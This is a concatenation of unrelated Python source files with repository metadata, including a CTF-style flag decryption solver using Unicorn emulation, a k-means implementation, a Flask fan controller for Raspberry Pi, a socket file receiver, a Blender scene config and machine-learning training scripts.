order=[line[i:i+n] for i in range(0, len(line), n)]
#print(order)
res=""
for i in order:
val=int(i,2)
res+=src[val]
#print(int(res,2))
return int(res,2)
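# pmulld mimics SSE PMULLD: both 128-bit operands are split into four 32-bit
# lanes which are multiplied lane by lane.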
@cached(cache={})
def pmulld(val1,val2):
line=bin(val1)[2:]
line=line.rjust(128,"0")
n=32
val1=[line[i:i+n] for i in range(0, len(line), n)]
line=bin(val2)[2:].rjust(128,"0")
n=32
val2=[line[i:i+n] for i in range(0, len(line), n)]
#print(val1,val2)
res=""
for i,j in zip(val1,val2):
res+=str(int(i,2)*int(j,2)).rjust(32,"0")
return int(res,16)
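# paddd mimics SSE PADDD: lane-wise addition of the four 32-bit lanes of two
# 128-bit values.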
@cached(cache={})
def paddd(val1,val2):
line=bin(val1)[2:]
line=line.rjust(128,"0")
n=32
val1=[line[i:i+n] for i in range(0, len(line), n)]
line=bin(val2)[2:].rjust(128,"0")
n=32
val2=[line[i:i+n] for i in range(0, len(line), n)]
#print(val1,val2)
res=""
for i,j in zip(val1,val2):
res+=str(int(i,2)+int(j,2)).rjust(32,"0")
return int(res,16)
@cached(cache={})
def m_fun(s1, s2, s3):
m = pmulld(s1, s2)
m = paddd(m, s3)
return m
@cached(cache={})
def fun(s1, s2, s3, s4):
m = m_fun(s1, s2, s3)
m = paddd(m, s4)
return m
@cached(cache={})
def mainFake():
start_time = time.time()
data = open('reverse_data', 'rb').read()
res = int.from_bytes(data[64:80], byteorder='little')
i0 = pshufd(res, 0x15)
i1 = pshufd(res, 0x45)
i2 = pshufd(res, 0x51)
i3 = pshufd(res, 0x54)
# print(hex(i0),hex(i1),hex(i2),hex(i3))
# ----------------------------------
# i = [
# [1, 0, 0, 0],
# [0, 1, 0, 0],
# [0, 0, 1, 0],
# [0, 0, 0, 1]
# ]
counter = 0x112210f47de98115
rax = 0
# d9 = int.from_bytes(data[:16], byteorder='little')
# d10 = int.from_bytes(data[16:32], byteorder='little')
# d13 = int.from_bytes(data[32:48], byteorder='little')
# d15 = int.from_bytes(data[48:64], byteorder='little')
#
# s00 = pshufd(d9, 0)
# s01 = pshufd(d9, 0x55)
# sss5= pshufd(d9, 0xaa)
# s03 = pshufd(d9, 0xff)
#
# s10 = pshufd(d10, 0)
# s5 = pshufd(d10, 0x55)
# s12 = pshufd(d10, 0xaa)
# s13 = pshufd(d10, 0xff)
#
# s20 = pshufd(d13, 0)
# s21 = pshufd(d13, 0x55)
# s22 = pshufd (d13, 0xaa)
# s23 = pshufd(d13, 0xff)
#
# s30 = pshufd(d15, 0)
# s31 = pshufd(d15, 0x55)
# s32 = pshufd(d15, 0xaa)
# s33 = pshufd(d15, 0xff)
#
# print(hex(s00 ), hex(s01), hex(sss5), hex(s03 ))
# print(hex(s10 ), hex(s5 ), hex(s12), hex(s13 ))
# print(hex(s20), hex(s21 ), hex(s22 ), hex(s23))
# print(hex(s30), hex(s31 ), hex(s32 ), hex(s33))
#
# #---------------------------------
s00 = 1 ; s01 = 2 ; s02 = 3 ; s03 = 4 ;
s10 = 5 ; s11 = 6 ; s12 = 7 ; s13 = 8 ;
s20 = 9 ; s21 = 10; s22 = 11; s23 = 12;
s30 = 13; s31 = 14; s32 = 15; s33 = 16;
# s = [
# [1 , 2, 3, 4],
# [5 , 6, 7, 8],
# [9 ,10,11,12],
# [13,14,15,16]
# ]
while(rax != counter):
# prima colonna
m6 = pmulld(s00, i3)
m8 = pmulld(s10, i3)
m11 = pmulld(s20, i3)
m14 = pmulld(s30, i3)
#--------------------
m12 = m_fun(s01, i2, m6) #xmm12s * xmm2 * xmm6 = xmm12
m5 = pmulld(s11, i1) #xmm5s *xmm1 = xmm5
i3 = fun(s03, i0, m5, m12)
mm5 = m_fun(s11, i2, m8)
m7 = m_fun(s21, i2, s20)
mm6 = pmulld(s12, i1) #64c
i2 = fun(s13, i0, mm6, mm5) #662
mmm5 = pmulld(s22, i1)
mmm6 = pmulld(s32, i1) #680
i1 = fun(s23, i0, mmm5, m7)
m4 = m_fun(s31, i2, m14)
i0 = fun(s33, i0, mmm6, m4)
#internal cycle
# m4 = pshufd(sres, 0xaa)
# m5 = pshufd(i0, 0)
# edx = 0x3e8
# internalCycle()
rax += 1
if rax % 10000000 == 0:
print(time.time()-start_time)
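# emulation() runs the embedded x86-64 snippet under the Unicorn engine: the
# computed matrix is loaded into XMM0-XMM3, the encrypted flag bytes are mapped
# into memory, the code is executed (it appears to XOR the flag with the matrix
# bytes), and the resulting buffer is printed.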
def emulation(matrix):
BASE = 0x400000
STACK = 0x7ffcaf000000
FLAG = 0x00600000
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(BASE, 1024*4)
mu.mem_map(STACK, 1024*4)
mu.mem_map(FLAG, 1024*1024)
code = struct.pack ("69B", *[
0x66,0x0f,0x7f,0x1c,0x24,0x66,0x0f,0x7f,0x54,0x24,0x10,
0x66,0x0f,0x7f,0x4c,0x24,0x20,0x66,0x0f,0x7f,0x44,0x24,
0x30,0x31,0xc0,0x66,0x2e,0x0f,0x1f,0x84,0x00,0x00,0x00,
0x00,0x00,0x0f,0x1f,0x00,0x0f,0xb6,0x0c,0x44,0x30,0x88,
0x90,0x10,0x60,0x00,0x0f,0xb6,0x4c,0x44,0x01,0x30,0x88,
0x91,0x10,0x60,0x00,0x48,0x83,0xc0,0x02,0x48,0x83,0xf8,
0x20,0x75,0xe1])
flag = struct.pack ("40B", *[
0xfc,0x14,0xeb,0x09,0xbc,0xae,0xe7,0x47,0x4f,0xe3,0x7c,
0xc1,0x52,0xa5,0x02,0x8e,0x89,0x71,0xc8,0x8d,0x96,0x23,
0x01,0x6d,0x71,0x40,0x5a,0xea,0xfd,0x46,0x1d,0x23,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00])
mu.reg_write(UC_X86_REG_RSP, STACK)
mu.reg_write(UC_X86_REG_XMM0, (matrix[0][0]<<96) + (matrix[0][1]<<64) + (matrix[0][2]<<32) + (matrix[0][3]))
mu.reg_write(UC_X86_REG_XMM1, (matrix[1][0]<<96) + (matrix[1][1]<<64) + (matrix[1][2]<<32) + (matrix[1][3]))
mu.reg_write(UC_X86_REG_XMM2, (matrix[2][0]<<96) + (matrix[2][1]<<64) + (matrix[2][2]<<32) + (matrix[2][3]))
mu.reg_write(UC_X86_REG_XMM3, (matrix[3][0]<<96) + (matrix[3][1]<<64) + (matrix[3][2]<<32) + (matrix[3][3]))
mu.mem_write(FLAG+0x1090, flag)
mu.mem_write(BASE, code)
mu.emu_start(BASE, BASE + len(code), 2 * UC_SECOND_SCALE)
print(mu.mem_read(FLAG+0x1090, 0x20))
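# moltiplication(exponent) squares the matrix `exponent` times, i.e. computes
# a**(2**exponent) by repeated squaring, reducing the entries with overflow()
# after each squaring.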
def moltiplication(exponent):
a = np.array([ \
[16,15,14,13], \
[12,11,10, 9], \
[8 , 7, 6, 5], \
[4 , 3, 2, 1] \
], dtype=object)
for i in range(exponent):
np.dot(a,a,a)
a = overflow(a)
return a
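# overflow() reduces every matrix entry modulo sres (read from reverse_data).
# Note that `data` is not defined in this function, so it relies on a global
# set elsewhere.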
def overflow(a):
sres = int.from_bytes(data[72:76], byteorder='little')
for x in range(4):
for y in range(4):
while a[x][y] > sres:
a[x][y] %= sres
return a
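# calculate_exponents() greedily decomposes 1234567890123456789 into a sum of
# powers of two and returns the list of exponents, largest first.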
def calculate_exponents():
res = []
s = 1234567890123456789
i=0
while(s>0):
if 2**i > s:
res.append(i-1)
s -= 2**(i-1)
i=0
else:
i+=1
return res
def main():
matrix = np.array([\
[1,0,0,0], \
[0,1,0,0], \
[0,0,1,0], \
[0,0,0,1] \
], dtype=object)
x = calculate_exponents()
print("lista: ", x)
for a in x:
        np.dot(matrix, moltiplication(a), matrix)
overflow(matrix)
print("matrix: ", matrix)
emulation(matrix)
main()
|
[
"passwd@mes3hacklab.org"
] |
passwd@mes3hacklab.org
|
84a7a06840ab94d52c126cf03c787d21cc39ba7c
|
66b332e1bc377db177f388a9adf04082113bc7a8
|
/k-means/Kmeans.py
|
f4cd72c11bf9e6f3174767ece3abfe780454d0f7
|
[
"MIT"
] |
permissive
|
JamieMa/ML_APIs
|
68d56263197c7be377f11996a63eaca4376feacd
|
364912bff7e33056de7b8d735ce4d8ab3ed53f81
|
refs/heads/master
| 2021-08-31T00:22:59.409764
| 2017-12-20T00:25:55
| 2017-12-20T00:25:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,089
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 11 21:30:38 2017
@author: mjq
"""
import numpy as np
import pandas as pd
from sklearn import datasets
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy.spatial import distance
from numpy import linalg as LA
def kMeans(X,n_clusters=8,max_iter=300,minWCSS=10000):
'''
:type X: 2D np array,each row is a record
n_clusters: positive int
max_iter: positive int
minWCSS:positive int
:rtype: dictionary
'''
if n_clusters>len(X):
print "Number of cluster exceeds number of input records"
print "Please select K again."
return
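    # WCSS: within-cluster "sum of squares", measured here as the sum of
    # Euclidean distances from each point to its assigned centroid.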
def WCSS(X,centroids,cluster_result):
sum_WCSS=0
for k in range(len(centroids)):
WCSS_cluster = 0
II = (cluster_result==k)
for j in range(np.sum(II)):
WCSS_cluster+=distance.euclidean(X[II][j],centroids[k])
sum_WCSS+=WCSS_cluster
return sum_WCSS
#randomly select initial centroids
idx = np.random.choice([i for i in range(len(X))],size=n_clusters,replace=False)
centroids = X[idx,:]
cluster_result = np.zeros(len(X))
pre_cluster_result=None
i=0
while i<=max_iter:
#calculate distance
for j in range(len(X)):
min_distance = distance.euclidean(X[j],centroids[0])
num_cluster = 0
for k in range(1,n_clusters):
cur_distance=distance.euclidean(X[j],centroids[k])
if cur_distance<min_distance:
min_distance=cur_distance
num_cluster=k
cluster_result[j]=num_cluster
#check if assignment no longer change
print np.sum(pre_cluster_result==cluster_result)
print np.all(pre_cluster_result==cluster_result)
if pre_cluster_result is not None and np.all(pre_cluster_result==cluster_result):
break
#update centroids
for k in range(n_clusters):
II = (cluster_result==k)
centroids[k]= np.mean(X[II],axis=0)
#deep copy cluster_result to pre_cluster_result
pre_cluster_result = np.copy(cluster_result)
i+=1
cur_WCSS=WCSS(X,centroids,cluster_result)
print "The %d's iterative with WCSS: %f "%(i,cur_WCSS)
final_WCSS=WCSS(X,centroids,cluster_result)
kmeans_result={"cluster_centers_":centroids,
"labels_":cluster_result,
"WCSS_":final_WCSS,
"max_iter_":i}
return kmeans_result
if __name__ == '__main__':
in_file_name = "SCLC_study_output_filtered.csv"
dataIn = pd.read_csv(in_file_name)
X = dataIn.drop(dataIn.columns[0], axis=1)
k=2
myKmeansResults = kMeans(X.values,n_clusters=k)
labels=myKmeansResults['labels_']
|
[
"noreply@github.com"
] |
JamieMa.noreply@github.com
|
45e084179e4aa3dbbf8c2f260fc7c5bd9989286e
|
daf802cfd22614f98596691220c08e15e76fa994
|
/Website/community/rcmOnUser/admin.py
|
389d4206e36951bdbe8c52aac0f01db0cd5d07cd
|
[] |
no_license
|
ee08b397/Community-Recommendation
|
c3b3a534a01622314ea382b4a1d13056537c36a8
|
557e774eeb6045637599f98c130e465bfe345f29
|
refs/heads/master
| 2021-01-17T01:09:28.298491
| 2015-08-15T03:54:04
| 2015-08-15T03:54:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 126
|
py
|
from django.contrib import admin
from rcmOnUser.models import score
# Register your models here.
admin.site.register(score)
|
[
"zhuangzeleng19920731@gmail.com"
] |
zhuangzeleng19920731@gmail.com
|
d0be4c85c1a19f7385e5175292eca406cec92339
|
c8158a7ae28e457e564f1a72b3e82d406aad8c98
|
/cfgs/test_config.py
|
8ca243856ed3a8070dfd268445e5715b8804b742
|
[] |
no_license
|
Wei2624/blender_datasets
|
aad26c7fdfc36c07f8bca3cbab57e16ae489be7a
|
8300b7b35ab5082eeaa313892ad099de74305acc
|
refs/heads/master
| 2020-04-15T19:21:54.028224
| 2019-01-10T02:01:59
| 2019-01-10T02:01:59
| 164,947,207
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,021
|
py
|
no_need_to_copy = ['Camera','Lamp','Lamp.001','Lamp.002','skp_camera_Last_Saved_SketchUp_View','background'\
,'Plane','Plane.001','Plane.002','Plane.003','Plane.004']
# static_classes = ['background','table']
# static_classes_color = [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)]
off_table_classes = ['chair']
off_table_classes_color = [(1.0, 0, 1.0)]
static_classes = ['table']
static_classes_color = [(1.0, 0.0, 0.0)]
obj_alpha = 1.0
# changing this can remove certain object from appearing in the scene
# dynamic_classes = ['book', 'keyboard', 'mug', 'detergent', 'bottle', 'pringles']
# dynamic_classes_color = [(0.0, 1.0, 0.0), (0.0, 1.0, 1.0), (0.0, 0.0, 0.5), (0.0, 0.0, 1.0),(1.0, 1.0, 0.0), (1.0, 0.0, 1.0)]
dynamic_classes = ['cerealbox', 'bowl', 'mug', 'can', 'cap']
dynamic_classes_color = [(0.0, 1.0, 0.0), (0.0, 1.0, 1.0), (0.0, 0.0, 0.5), (0.0, 0.0, 1.0),(1.0, 1.0, 0.0)]
# dynamic_classes = ['chair']
# dynamic_classes_color = [(0.0, 1.0, 1.0)]
#table dimension parameters
table_height = 1.
table_dim = (1.5, 1., 1.5)
table_top_num_obj = 4
area_div = 4
v_bound = 0.51
h_bound = 0.51
h_div_unit = 0.03
v_div_unit = 0.03
#Lights parameters
num_of_lights = 3
randomize_xyz = False
lamp_xy = [(1.3, -0.75),(-1.3, -0.75),(0, 1.5)]
plane_scale = 20
light_z_range = (1.8, 3)
range_unit = 0.1
# texture information
tex_idx_dict = {'table0_0':[0],\
'book0_2': [0],'book1_1':[0],'book2_3': [0],'book3_0': [0],'book4_0': [0,1,2,3,4],\
'table1_0':[0],\
'bottle0_4': [0],'bottle1_4': [0],'bottle2_0': [0],'bottle3_11':[0],'bottle4_10':[0],'bottle4_15':[0],'bottle5_1': [0],'bottle5_9': [0],'bottle6_0': [0],\
'table2_0': [0],\
'detergent0_1':[0],'detergent1_0': [0],'detergent2_4': [0],'detergent3_3': [0],'detergent3_5': [0],'detergent4_0': [0],'detergent5_7': [0],\
'table3_0':[2],\
'keyboard0_24':[0],'keyboard1_190':[0],'keyboard2_72':[0],'keyboard3_99':[0],'keyboard4_484':[0],'keyboard5_289':[0],\
'table4_0':[0],\
'mug0_0': [0],'mug1_3': [0],'mug2_5': [0],'mug3_0': [0],'mug4_7': [0],'mug5_2': [0],'mug6_0': [0],'mug7_2':[0], 'mug8_6':[0],'mug9_4':[0],'mug10_3':[0],\
'table5_0':[0],'table6_0':[1],'table7_0': [0],'chair8_0': [0],'chair9_0':[0],\
'pringles1_1': [0],'pringles1_2': [0],'pringles2_2': [0],\
'cerealbox0_0': [0],'cerealbox0_1': [0],'cerealbox0_3': [0],'cerealbox0_5': [0],'cerealbox0_6': [0],'cerealbox0_7': [0],'cerealbox0_8': [0],\
'cerealbox1_71': [0],'cerealbox1_166': [0],'cerealbox1_66': [0],'cerealbox1_123': [0],\
'cerealbox2_493': [0],'cerealbox2_302': [0],'cerealbox2_349': [0],'cerealbox2_256': [0],'cerealbox2_194': [0],'cerealbox2_494': [0],'cerealbox2_225': [0],'cerealbox2_257': [0], 'cerealbox2_203': [0],\
'cerealbox3_1': [0],'cerealbox3_5': [0],'cerealbox3_4': [0],'cerealbox3_0': [0],'cerealbox3_2': [0],\
'cerealbox4_42': [0], \
'cerealbox5_0': [0], 'cerealbox5_1': [0],'cerealbox5_2': [0],'cerealbox5_4': [0],\
'cerealbox6_6': [0], 'cerealbox7_0': [0], 'cerealbox8_5':[0],'cerealbox8_0':[0],'cerealbox8_1':[0],'cerealbox8_6':[0],\
'cerealbox9_5':[0],\
'bowl0_2': [0],'bowl1_0': [0],'bowl2_2': [0], 'bowl3_1': [0], 'bowl4_1': [0], 'bowl5_0': [0], 'bowl6_0':[0],\
'can0_3': [0], 'can1_8': [0], 'can2_0': [0], 'can3_0': [0], 'can4_5': [0], 'can5_1': [0],\
'cap0_0': [0],'cap1_60': [0], 'cap1_102': [0], 'cap2_6': [0], 'cap3_2': [0], 'cap4_21': [0], 'cap5_10':[0], 'cap6_15':[0], 'cap6_11':[0],\
'cap7_0': [0], 'cap8_16':[0], 'cap8_0': [0],\
'chair0_0': [2],'chair1_0':[0], 'chair2_0': [2], 'chair3_0': [0,1,2,3,4],'chair4_0':[0],'chair5_0':[1],'chair6_0': [0],'chair7_0':[2],'chair8_0':[3],'chair9_0':[3]
}
# Gaussian samples
normal_m = 0
normal_s = 0.2
# position of background in range on x y
background_range = (1.2, 2.7)
# interval where script reloads a scene
change_scene_interval = 4
# camera parameters for keyframes
degree_interval = 30
num_degrees = 12
cam_height_range = (1.3, 2.7)
cam_xy_range = (1.5, 2.5)
total_frames = 100
target_point = (0,0,1.2)
|
[
"weiuw2624@gmail.com"
] |
weiuw2624@gmail.com
|
ddcda8626fa93c0e39ab42cbd537075f0c2726a5
|
0fe5a7ede2c3e8c4d47a85eebe959e2ab749568b
|
/kits19.py
|
2735abe5d5da8a3f71086197a6fd9c09999151e8
|
[] |
no_license
|
FlyGlider/Kits19
|
2ad9e1befb44f7e23f56c8b42b1b81d350361620
|
20efc3327c7a74431bb53fc3d58e453b791df49e
|
refs/heads/master
| 2020-06-25T23:03:51.926141
| 2019-07-29T12:35:42
| 2019-07-29T12:35:42
| 199,448,545
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,893
|
py
|
from utils.trainer import *
from utils.evaluator import Evaluator
# from utils.tester import Tester
plt.switch_backend('agg')
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--epoch', dest='epoch', default=100, type=int,
help='number of epochs')
parser.add_argument('-b', '--batch-size', dest='batchsize', default=1,
type=int, help='batch size')
parser.add_argument('-l', '--learning-rate', dest='lr', default=0.0003,
type=float, help='learning rate')
parser.add_argument('-g', '--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
parser.add_argument('-v', '--val', dest='val', default=0,
type=int, help='choose which validation')
parser.add_argument('-r', '--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)') # checkpoints_2d/model_best_0_200.pth
parser.add_argument('-w', '--num_workers', dest='num_workers', default=0,
type=int, help='how many subprocesses to use for data loading')
parser.add_argument('-p', '--pre_load', dest='pre_load', default=False,
                        type=bool, help='whether to pre-load dataset')  # in practice, passing any value makes this True
parser.add_argument('--ts', dest='train_samples', default=1000,
type=int, help='how many train sample in one epoch')
parser.add_argument('--vs', dest='val_samples', default=100,
type=int, help='how many val sample in one epoch')
parser.add_argument('-s', '--stage', dest='stage', default='train',
type=str, help='choose the best model in which stage')
args = parser.parse_args()
return args
if __name__ == '__main__':
dir_h5_train = 'h5_data_train_2d/'
dir_checkpoint = 'checkpoints/2d/'
dir_prediction = 'predictions/2d/'
create_dir(dir_checkpoint)
create_dir(dir_prediction)
dataset_props = load_pickle('dataset_props.pkl')
pool_layer_kernel_sizes = dataset_props['plan_2d']['pool_layer_kernel_sizes']
args = get_args()
model = ResUNet(in_ch=1, base_num_features=30, num_classes=3, norm_type='batch', nonlin_type='relu', pool_type='max',
pool_layer_kernel_sizes=pool_layer_kernel_sizes, deep_supervision=True, mode='2D')
trainer = Trainer(model, dir_h5_train, dir_checkpoint, args)
trainer.run()
model = ResUNet(in_ch=1, base_num_features=30, num_classes=3, norm_type='batch', nonlin_type='relu', pool_type='max',
pool_layer_kernel_sizes=pool_layer_kernel_sizes, deep_supervision=False, mode='2D')
evaluator = Evaluator(model, dir_h5_train, dir_checkpoint, dir_prediction, args)
evaluator.run()
|
[
"noreply@github.com"
] |
FlyGlider.noreply@github.com
|
eaa1694453e2fb1d8f4e20c3a6a0852dc8c2f92c
|
bec66ec0c920939547466b2b8f9d65813d560d1d
|
/noxious/__init__.py
|
f007d1198e0435f72d773eb479f29a48d9534092
|
[] |
no_license
|
mbr/noxious
|
cbb3be2ca725a0282db390520306da7ebba75339
|
6c48fe84867d80614defa6bdce4d4640ce657ae5
|
refs/heads/master
| 2023-06-06T20:42:08.079423
| 2015-08-30T10:54:52
| 2015-08-30T10:54:52
| 41,625,389
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,557
|
py
|
import xml.etree.ElementTree as ET
def from_file(fn):
tree = ET.parse(fn)
return Noxious(tree.getroot())
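# Noxious wraps an ElementTree element: item access (obj['child']) returns a
# wrapped child element, attribute access (obj.attr) returns an XML attribute,
# and str()/int()/float() convert the element's text.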
class Noxious(object):
def __init__(self, elem, parent=None):
self._parent = parent
self._elem = elem
def _all(self):
return [self.__class__(sibling)
for sibling in self._parent._elem.findall(self._elem.tag)]
def _get_path(self):
path = []
tag = self
while tag:
path.insert(0, tag._elem.tag)
tag = tag._parent
root = path.pop(0)
return root + ''.join('[{!r}]'.format(p) for p in path)
def _text(self):
return self._elem.text
def __add__(self, other):
return str(self) + other
def __bool__(self):
e = self._elem
return bool(e.text or list(e))
def __float__(self):
return float(str(self))
def __int__(self):
return int(str(self))
def __getitem__(self, name):
child = self._elem.find(name)
if child is None:
raise KeyError('No child {} on {!r}'.format(name, self))
return self.__class__(child, self)
def __getattr__(self, name):
if name not in self._elem.attrib:
raise AttributeError('No attribute {} on {!r}'.format(name, self))
return self._elem.attrib[name]
# py2:
__nonzero__ = __bool__
def __radd__(self, other):
return other + str(self)
def __str__(self):
return self._text()
def __repr__(self):
return self._get_path()
|
[
"git@marcbrinkmann.de"
] |
git@marcbrinkmann.de
|
b0f222bd5a142c4071329ebd4c463e0851986566
|
d9a1999622bed85264ac65c57e90368d1a6e0e3e
|
/IoT/Flask/Exercise2.py
|
07ed4802fe801fde1e0b9bc9755ec8a7692341d5
|
[] |
no_license
|
dev-saem/IoT
|
38769f1906429c039e310daa1f8da74549c6e3e2
|
43ba904dd013c3d49ca8bfaa93cf2d6385d64927
|
refs/heads/main
| 2023-08-20T02:08:36.760510
| 2021-10-21T05:11:40
| 2021-10-21T05:11:40
| 419,588,914
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,244
|
py
|
import RPi.GPIO as GPIO
from flask import Flask
from time import sleep
app = Flask(__name__)
@app.route('/')
def hello():
return "hello world"
@app.route('/fan/<onoff>/<time>')
def fanonoff(onoff, time):
if (onoff == "on") and (time == "1"):
print("FAN on for one second")
GPIO.output(18,1)
GPIO.output(27,0)
sleep(1.0)
GPIO.output(18,0)
GPIO.output(27,0)
return "FAN on for 1 second"
elif (onoff == "on") and (time == "2"):
print("FAN on for two second")
GPIO.output(18,1)
GPIO.output(27,0)
sleep(2.0)
GPIO.output(18,0)
GPIO.output(27,0)
return "FAN on for 2 seconds"
elif (onoff == "on") and (time == "3"):
print("FAN on for three second")
GPIO.output(18,1)
GPIO.output(27,0)
sleep(3.0)
GPIO.output(18,0)
GPIO.output(27,0)
return "FAN on for 3 seconds"
if __name__ == "__main__":
GPIO.setmode(GPIO.BCM)
GPIO.setup(4,GPIO.OUT, initial = GPIO.LOW)
GPIO.setup(18, GPIO.OUT, initial = GPIO.LOW)
GPIO.setup(27, GPIO.OUT, initial = GPIO.LOW)
app.run(host = '0.0.0.0', port = 5000, debug = True)
|
[
"noreply@github.com"
] |
dev-saem.noreply@github.com
|
f37668bdf7c079415ac4d8ece79b2a23765d21aa
|
71449d985dd2d9f9133822952664a19b0dbfaf91
|
/combine/files/utils.py
|
f8d1268f777119a44ce6aab38f97b2b86f8fbe75
|
[
"MIT"
] |
permissive
|
dropseed/combine
|
f7e6387f2a2a18420398022622afe9c1188fcced
|
7bf2b513877ddbc9911f0e79f9b82c3a770cece7
|
refs/heads/master
| 2023-07-05T22:35:23.107892
| 2023-07-04T01:51:25
| 2023-07-04T01:51:25
| 137,275,296
| 11
| 3
|
MIT
| 2023-09-04T20:14:40
| 2018-06-13T21:50:06
|
Python
|
UTF-8
|
Python
| false
| false
| 164
|
py
|
import os
def create_parent_directory(path: str) -> None:
path_dir = os.path.dirname(path)
if not os.path.exists(path_dir):
os.makedirs(path_dir)
|
[
"dave.gaeddert@gmail.com"
] |
dave.gaeddert@gmail.com
|
a15aa9381f0639460207512eace0c0e66ea54b4b
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1602_2049.py
|
1ce019700e7801903c6df341e812f94f4b2cb946
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
# Test your code a little at a time.
# Don't test everything only at the end, or it becomes harder to spot errors.
# Don't be intimidated by error messages. They help you fix your code.
x=int(input("informe o dividendo: " ))
y=int(input("informe o divisor: " ))
print (x)
print (y)
print (x//y)
print (x%y)
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
0c14069b57089a2f4811e42046ae71152a6bdbd6
|
f066a92934f4d6c64d20bc3c455ee1100624983b
|
/run/stdio.py
|
4c26791e53b62afe6a488d1086c07419ea38a737
|
[] |
no_license
|
BitOpenFPGA/fpga_test_soc
|
229a15f0ff7280546a6a250dab624db04b196dd8
|
fe7c5f7b655371ed3be7f2171301608e24180491
|
refs/heads/master
| 2022-04-07T12:49:55.872758
| 2020-03-21T10:49:15
| 2020-03-21T10:49:15
| 304,899,091
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,166
|
py
|
#!/usr/bin/env python
import sys
import atexit
import termios
import os
orig_term = None
##################################################################
# stdio_init
##################################################################
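# Puts stdin into non-canonical, no-echo, non-blocking mode (VMIN=0, VTIME=0)
# and registers stdio_close() to restore the original settings on exit.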
def stdio_init():
atexit.register(stdio_close)
global orig_term
orig_term = termios.tcgetattr(sys.stdin)
new_settings = termios.tcgetattr(sys.stdin)
new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON)
new_settings[6][termios.VMIN] = 0
new_settings[6][termios.VTIME] = 0
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
##################################################################
# stdio_close
##################################################################
def stdio_close():
global orig_term
if orig_term:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, orig_term)
##################################################################
# stdio_read
##################################################################
def stdio_read():
ch = os.read(sys.stdin.fileno(), 1)
if len(ch) > 0:
        return ch
else:
return None
|
[
"ultraembedded.com@gmail.com"
] |
ultraembedded.com@gmail.com
|
cb49bec2a5718c4576520ccf546458370bb74044
|
a8f73dcf71eb3be1387a4c5fc766ad2e14a64fd4
|
/recorder/scripts/socket_server.py
|
cdeaa0ede4b5933db55dd0fb9eb94743ff33cd30
|
[] |
no_license
|
ZhengYi0310/eve_workspace
|
3a192ab797fe21130ba45a9a09431ddc8f5662a5
|
5c73cebfaf37820ba4d1f1354632370434816921
|
refs/heads/master
| 2021-01-19T02:10:18.657989
| 2017-06-30T19:14:05
| 2017-06-30T19:14:05
| 87,264,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,044
|
py
|
# first of all import the socket library
import socket
ip = socket.gethostbyname('bml-ALL-SERIES')
print "The client hostname is %s." %(ip)
# next create a socket object
s_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "socket on eve successfully created."
# reserve a port on the pc, here port 9999
port = 9999
# Next bind the socket to the chosen port on the host "eve"
# so that clients on the network can connect to this server
s_server.bind(("eve", port))
print "socket bound to %s." %(port)
s_server.listen(10)
s_client, address = s_server.accept()
print "socket is listening."
print s_client.recv(8192)
s_client.send('Hello Joy !')
print "handshake ! now starting transfer file !"
f = open("test.json", "wb")
l = s_client.recv(8192)
while (l):
f.write(l)
l = s_client.recv(1024)
#print "receiving"
s_client.send('file received by Eve!')
print "file received !"
f.close()
s_client.close()
s_server.close()
|
[
"hczhengcq@gmail.com"
] |
hczhengcq@gmail.com
|
d020f7a59f0738fc32cb65ab2d97b3c8c707060d
|
5c5beb07756060ce7ccc9c4256d4c5521f4acee9
|
/SinGAN/editing.py
|
32221515e948beb759f9377ecae96fee275d20b5
|
[] |
no_license
|
JaeDukSeo/SinGAN-extension
|
a2e5fb3ae442a28cebe77592a3668367347e3422
|
23afc01ebe568f93e01c377b0a94e0dad26ac64a
|
refs/heads/master
| 2022-07-03T12:04:56.295212
| 2020-05-13T15:24:48
| 2020-05-13T15:24:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,301
|
py
|
from .config import get_arguments
from .SinGAN.manipulate import *
from .SinGAN.training import *
from .SinGAN.imresize import imresize
from .SinGAN.imresize import imresize_to_shape
from .SinGAN import functions
if __name__ == '__main__':
parser = get_arguments()
parser.add_argument('--input_dir', help='input image dir', default='Input\\Images')
parser.add_argument('--input_name', help='training image name', required=True)
parser.add_argument('--ref_dir', help='input reference dir', default='Input\\Editing')
parser.add_argument('--ref_name', help='reference image name', required=True)
parser.add_argument('--editing_start_scale', help='editing injection scale', type=int, required=True)
parser.add_argument('--mode', help='task to be done', default='editing')
opt = parser.parse_args()
opt = functions.post_config(opt)
Gs = []
Zs = []
reals = []
NoiseAmp = []
dir2save = functions.generate_dir2save(opt)
if dir2save is None:
print('task does not exist')
#elif (os.path.exists(dir2save)):
# print("output already exist")
else:
try:
os.makedirs(dir2save)
except OSError:
pass
